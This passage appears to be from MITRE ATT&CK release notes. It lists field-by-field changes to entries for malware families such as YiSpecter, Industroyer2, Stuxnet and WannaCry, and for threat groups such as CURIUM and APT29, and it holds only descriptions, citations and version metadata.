[YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_aliases | | ['YiSpecter']
x_mitre_deprecated | | False
x_mitre_platforms | | ['Android', 'iOS']
external_references | | https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-04-20 18:19:15.826000+00:00
description | [YiSpecter](https://attack.mitre.org/software/S0311) iOS malware that affects both jailbroken and non-jailbroken iOS devices. It is also unique because it abuses private APIs in the iOS system to implement functionality. (Citation: PaloAlto-YiSpecter) | [YiSpecter](https://attack.mitre.org/software/S0311) is a family of iOS and Android malware, first detected in November 2014, targeting users in mainland China and Taiwan. [YiSpecter](https://attack.mitre.org/software/S0311) abuses private APIs in iOS to infect both jailbroken and non-jailbroken devices.(Citation: paloalto_yispecter_1015)
external_references[1]['source_name'] | YiSpecter | paloalto_yispecter_1015
external_references[1]['description'] | (Citation: PaloAlto-YiSpecter) | Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved March 3, 2023.
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 2.0
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'PaloAlto-YiSpecter', 'description': 'Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. Retrieved January 20, 2017.', 'url': 'https://researchcenter.paloaltonetworks.com/2015/10/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/'} | 

Minor Version Changes

[S0432] Bread

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-10-14 14:42:53.609000+00:00 | 2023-04-21 18:53:30.817000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2

[S0322] HummingBad

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_aliases | | ['HummingBad']
x_mitre_deprecated | | False
external_references | | http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-04-21 18:52:08.966000+00:00
external_references[1]['source_name'] | HummingBad | ArsTechnica-HummingBad
external_references[1]['description'] | (Citation: ArsTechnica-HummingBad) | Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.0 | 1.1
iterable_item_removed
STIX Field | Old value | New Value
external_references | {'source_name': 'ArsTechnica-HummingBad', 'description': 'Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. Retrieved January 24, 2017.', 'url': 'http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/'} | 

Patches

[S0655] BusyGasper

Current version: 1.0

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2021-10-14 15:38:53.014000+00:00 | 2023-03-28 17:20:20.194000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0

ics-attack

New Software

[S1072] Industroyer2

Current version: 1.0

Description: [Industroyer2](https://attack.mitre.org/software/S1072) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://attack.mitre.org/software/S0604). Security researchers assess that [Industroyer2](https://attack.mitre.org/software/S1072) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://attack.mitre.org/software/S1072) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.(Citation: Industroyer2 Blackhat ESET)

Minor Version Changes

[S0496] REvil

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-05-24 21:09:01.019000+00:00 | 2023-03-26 20:06:33.317000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.0 | 2.1

[S0603] Stuxnet

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)

New Description
[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-20 20:31:32.664000+00:00 | 2023-03-20 13:50:55.168000+00:00
description | [Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier) | [Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
external_references[1]['description'] | (Citation: Symantec W.32 Stuxnet Dossier) | (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
external_references[4]['source_name'] | Symantec W.32 Stuxnet Dossier | Nicolas Falliere, Liam O Murchu, Eric Chien February 2011
external_references[4]['description'] | Nicolas Falliere, Liam O. Murchu, Eric Chien. (2011, February). W32.Stuxnet Dossier. Retrieved December 7, 2020. | Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22
external_references[4]['url'] | https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf | https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf
external_references[5]['description'] | Ralph Langner. (2013, November). Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020. | Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.2 | 1.3

Patches

[S0608] Conficker

Current version: 1.0

Details
dictionary_item_added
STIX Field: New Value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2022-04-25 14:00:00.188000+00:00 → 2023-03-08 22:15:47.458000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[S0038] Duqu

Current version: 1.2

Details
dictionary_item_added
STIX Field: New Value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2022-04-25 14:00:00.188000+00:00 → 2023-03-08 22:17:50.971000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[S0605] EKANS

Current version: 2.0

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-05-11 14:00:00.188000+00:00 → 2023-03-08 22:04:48.834000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[S1045] INCONTROLLER

Current version: 1.0

Details
dictionary_item_added
STIX Field: New Value
x_mitre_contributors: ['Jimmy Wylie, Dragos, Inc.']
values_changed
STIX Field: Old value → New Value
modified: 2022-10-18 16:49:51.348000+00:00 → 2023-03-17 16:23:24.812000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[S0607] KillDisk

Current version: 1.1

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-05-11 14:00:00.188000+00:00 → 2023-03-08 22:13:42.357000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[S0372] LockerGoga

Current version: 2.0

Details
values_changed
STIX Field: Old value → New Value
modified: 2022-05-23 21:22:58.477000+00:00 → 2023-03-08 22:03:50.370000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[S0368] NotPetya

Current version: 2.0

Details
dictionary_item_added
STIX Field: New Value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2022-04-25 14:00:00.188000+00:00 → 2023-03-08 22:11:21.842000+00:00
external_references[4]['source_name']: Petrwrap → Nyetya
external_references[4]['description']: (Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017) → (Citation: Talos Nyetya June 2017)
external_references[5]['source_name']: Nyetya → Petrwrap
external_references[5]['description']: (Citation: Talos Nyetya June 2017) → (Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)
external_references[6]['source_name']: Talos Nyetya June 2017 → ESET Telebots June 2017
external_references[6]['description']: Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019. → Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.
external_references[6]['url']: https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html → https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/
external_references[7]['source_name']: US-CERT NotPetya 2017 → Talos Nyetya June 2017
external_references[7]['description']: US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019. → Chiu, A. (2016, June 27). New Ransomware Variant "Nyetya" Compromises Systems Worldwide. Retrieved March 26, 2019.
external_references[7]['url']: https://www.us-cert.gov/ncas/alerts/TA17-181A → https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html
external_references[8]['source_name']: ESET Telebots June 2017 → US District Court Indictment GRU Unit 74455 October 2020
external_references[8]['description']: Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020. → Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
external_references[8]['url']: https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/ → https://www.justice.gov/opa/press-release/file/1328521/download
external_references[9]['source_name']: US District Court Indictment GRU Unit 74455 October 2020 → US-CERT NotPetya 2017
external_references[9]['description']: Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020. → US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.
external_references[9]['url']: https://www.justice.gov/opa/press-release/file/1328521/download → https://www.us-cert.gov/ncas/alerts/TA17-181A
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

[S1009] Triton

Current version: 1.0


Old Description
[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: DHS CISA February 2019) (Citation: Schneider Electric January 2018) (Citation: Julian Gutmanis March 2019) (Citation: Schneider December 2018) (Citation: Jos Wetzels January 2018)

New Description
[Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)
Details
values_changed
STIX Field: Old value → New Value
modified: 2022-10-12 18:29:38.831000+00:00 → 2022-11-23 14:27:54.711000+00:00
description: [Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. (Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017) (Citation: Dragos December 2017) (Citation: DHS CISA February 2019) (Citation: Schneider Electric January 2018) (Citation: Julian Gutmanis March 2019) (Citation: Schneider December 2018) (Citation: Jos Wetzels January 2018) → [Triton](https://attack.mitre.org/software/S1009) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers.(Citation: Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer December 2017)(Citation: Dragos December 2017)(Citation: DHS CISA February 2019)(Citation: Schneider Electric January 2018)(Citation: Julian Gutmanis March 2019)(Citation: Schneider December 2018)(Citation: Jos Wetzels January 2018)
x_mitre_attack_spec_version: 2.1.0 → 3.0.0

[S0366] WannaCry

Current version: 1.1

Details
dictionary_item_added
STIX Field: New Value
x_mitre_deprecated: False
values_changed
STIX Field: Old value → New Value
modified: 2022-04-25 14:00:00.188000+00:00 → 2023-03-08 22:20:20.868000+00:00
external_references[1]['source_name']: WanaCry → WanaCrypt0r
external_references[1]['description']: (Citation: SecureWorks WannaCry Analysis) → (Citation: LogRhythm WannaCry)
external_references[2]['source_name']: WanaCrypt → WCry
external_references[2]['description']: (Citation: SecureWorks WannaCry Analysis) → (Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis)
external_references[3]['source_name']: WanaCrypt0r → WanaCry
external_references[3]['description']: (Citation: LogRhythm WannaCry) → (Citation: SecureWorks WannaCry Analysis)
external_references[4]['source_name']: WCry → WanaCrypt
external_references[4]['description']: (Citation: LogRhythm WannaCry)(Citation: SecureWorks WannaCry Analysis) → (Citation: SecureWorks WannaCry Analysis)
external_references[5]['source_name']: LogRhythm WannaCry → FireEye WannaCry 2017
external_references[5]['description']: Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019. → Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.
external_references[5]['url']: https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/ → https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html
external_references[6]['source_name']: US-CERT WannaCry 2017 → SecureWorks WannaCry Analysis
external_references[6]['description']: US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019. → Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019.
external_references[6]['url']: https://www.us-cert.gov/ncas/alerts/TA17-132A → https://www.secureworks.com/research/wcry-ransomware-analysis
external_references[8]['source_name']: FireEye WannaCry 2017 → LogRhythm WannaCry
external_references[8]['description']: Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019. → Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.
external_references[8]['url']: https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html → https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/
external_references[9]['source_name']: SecureWorks WannaCry Analysis → US-CERT WannaCry 2017
external_references[9]['description']: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019. → US-CERT. (2017, May 12). Alert (TA17-132A): Indicators Associated With WannaCry Ransomware. Retrieved March 25, 2019.
external_references[9]['url']: https://www.secureworks.com/research/wcry-ransomware-analysis → https://www.us-cert.gov/ncas/alerts/TA17-132A
x_mitre_attack_spec_version: 2.1.0 → 3.1.0

Groups

enterprise-attack

New Groups

[G1012] CURIUM

Current version: 1.0

Description: [CURIUM](https://attack.mitre.org/groups/G1012) is an Iranian threat group first reported in November 2021 that has invested in building a relationship with potential targets via social media over a period of months to establish trust and confidence before sending malware. Security researchers note [CURIUM](https://attack.mitre.org/groups/G1012) has demonstrated great patience and persistence by chatting with potential targets daily and sending benign files to help lower their security consciousness.(Citation: Microsoft Iranian Threat Actor Trends November 2021)


[G1014] LuminousMoth

Current version: 1.0

Description: [LuminousMoth](https://attack.mitre.org/groups/G1014) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://attack.mitre.org/groups/G1014) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://attack.mitre.org/groups/G1014) and [Mustang Panda](https://attack.mitre.org/groups/G0129) based on similar targeting and TTPs, as well as network infrastructure overlaps.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)


[G1013] Metador

Current version: 1.0

Description: [Metador](https://attack.mitre.org/groups/G1013) is a suspected cyber espionage group that was first reported in September 2022. [Metador](https://attack.mitre.org/groups/G1013) has targeted a limited number of telecommunication companies, internet service providers, and universities in the Middle East and Africa. Security researchers named the group [Metador](https://attack.mitre.org/groups/G1013) based on the "I am meta" string in one of the group's malware samples and the expectation of Spanish-language responses from C2 servers.(Citation: SentinelLabs Metador Sept 2022)

Major Version Changes

[G0016] APT29

Current version: 4.0

Version changed from: 3.1 → 4.0


Old Description
[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)

New Description
[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)
Details
dictionary_item_removed
STIX Field: Old value
external_references: https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
values_changed
STIX Field: Old value → New Value
modified: 2022-07-11 20:34:55.717000+00:00 → 2023-04-16 22:25:01.191000+00:00
description: [APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021) → [APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021) In April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Industry reporting also referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Unit 42 SolarStorm December 2020)
external_references[9]['source_name']: IRON HEMLOCK → Blue Kitsune
external_references[9]['description']: (Citation: Secureworks IRON HEMLOCK Profile) → (Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)
external_references[10]['source_name']: IRON RITUAL → IRON HEMLOCK
external_references[10]['description']: (Citation: Secureworks IRON RITUAL Profile) → (Citation: Secureworks IRON HEMLOCK Profile)
external_references[11]['source_name']: NobleBaron → IRON RITUAL
external_references[11]['description']: (Citation: SentinelOne NobleBaron June 2021) → (Citation: Secureworks IRON RITUAL Profile)
external_references[12]['source_name']: Dark Halo → NobleBaron
external_references[12]['description']: (Citation: Volexity SolarWinds) → (Citation: SentinelOne NobleBaron June 2021)
external_references[13]['source_name']: Crowdstrike DNC June 2016 → SolarStorm
external_references[13]['description']: Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016. → (Citation: Unit 42 SolarStorm December 2020)
external_references[14]['source_name']: Volexity SolarWinds → Dark Halo
external_references[14]['description']: Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020. → (Citation: Volexity SolarWinds)
external_references[15]['source_name']: CrowdStrike SUNSPOT Implant January 2021 → Crowdstrike DNC June 2016
external_references[15]['description']: CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021. → Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
external_references[15]['url']: https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/ → https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/
external_references[16]['source_name']: CrowdStrike StellarParticle January 2022 → Volexity SolarWinds
external_references[16]['description']: CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022. → Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.
external_references[16]['url']: https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ → https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
external_references[17]['source_name']: GRIZZLY STEPPE JAR → CrowdStrike SUNSPOT Implant January 2021
external_references[17]['description']: Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017. → CrowdStrike Intelligence Team. (2021, January 11). SUNSPOT: An Implant in the Build Process. Retrieved January 11, 2021.
external_references[17]['url']: https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf → https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/
external_references[18]['source_name']: FireEye APT29 Nov 2018 → CrowdStrike StellarParticle January 2022
external_references[18]['description']: Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018. → CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.
external_references[18]['url']: https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html → https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
external_references[19]['source_name']: F-Secure The Dukes → GRIZZLY STEPPE JAR
external_references[19]['description']: F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015. → Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
external_references[19]['url']: https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf → https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
external_references[20]['source_name']: ESET Dukes October 2019 → FireEye APT29 Nov 2018
external_references[20]['description']: Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020. → Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.
external_references[20]['url']: https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf → https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
external_references[21]['source_name']: FireEye SUNBURST Backdoor December 2020 → F-Secure The Dukes
external_references[21]['description']: FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021. → F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.
external_references[21]['url']: https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html → https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf
external_references[22]['source_name']: SentinelOne NobleBaron June 2021 → ESET Dukes October 2019
